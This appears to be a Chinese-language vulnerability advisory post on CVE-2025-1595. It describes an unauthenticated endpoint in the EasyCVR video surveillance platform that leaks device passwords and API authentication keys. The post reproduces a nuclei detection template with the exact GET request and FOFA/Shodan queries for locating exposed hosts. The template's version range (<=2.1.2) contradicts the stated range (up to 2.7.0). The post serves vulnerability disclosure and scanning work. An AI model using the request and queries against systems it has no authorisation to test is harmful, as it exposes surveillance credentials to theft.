EasyCVR 信息泄露漏洞

漏洞信息

漏洞名称: EasyCVR 信息泄露漏洞

漏洞编号:

  • CVE: CVE-2025-1595

漏洞类型: 信息泄露

漏洞等级: 中危

漏洞描述: EasyCVR是由安徽旭帆信息技术有限公司开发的一款视频监控平台软件,广泛应用于企业级视频监控系统中,支持多种视频流的接入、转码、存储和分发,是构建智能视频监控解决方案的重要组件。该软件在多个行业中有广泛的应用,包括公共安全、交通管理、智慧城市等。

该漏洞存在于EasyCVR的/api/v1/getbaseconfig接口中,由于未对访问该接口的请求进行适当的权限验证和敏感信息过滤,导致攻击者可以远程获取到包括设备密码和API认证信息在内的敏感数据。这种信息泄露漏洞的根源在于缺乏对敏感接口的访问控制和数据保护措施,使得未经授权的用户可以轻易获取系统关键信息。

利用此漏洞,攻击者可以获取到系统的敏感配置信息,如设备密码和API认证密钥,这些信息可能被用于进一步的攻击,如未授权访问系统、数据泄露或其他恶意操作。由于该漏洞可以被远程利用且无需任何形式的认证,因此其潜在的安全风险较高。尽管漏洞的CVSS评分为5.3,属于中危级别,但在实际应用中,如果攻击者能够结合其他漏洞或信息进行攻击,可能会对系统造成更严重的影响。

产品厂商: Anhui Xufan Information Technology

产品名称: EasyCVR

影响版本: <=2.7.0

搜索语法: title=”EasyCVR”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/8e316632579906c38beb1c2a9b6d1d4bce17e13e/http%2Fcves%2F2025%2FCVE-2025-1595.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

id: CVE-2025-1595

info:
  name: EasyCVR <=2.1.2 - Information Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    A vulnerability has been found in Anhui Xufan Information Technology EasyCVR up to 2.7.0 and classified as problematic. This vulnerability affects unknown code of the file /api/v1/getbaseconfig. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1595
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-1595
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="EasyCVR"
    shodan-query: http.title:"EasyCVR"
    product: easycvr
  tags: cve,cve2025,exposure,easycvr

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/getbaseconfig"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'DevicePassword":'
          - 'APIAuth":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200


Github Poc
#projectdiscovery/nuclei-templates:github issues #信息泄露
EasyCVR 信息泄露漏洞
http://example.com/2025/07/30/github_4096592139/
作者
lianccc
发布于
2025年7月30日
许可协议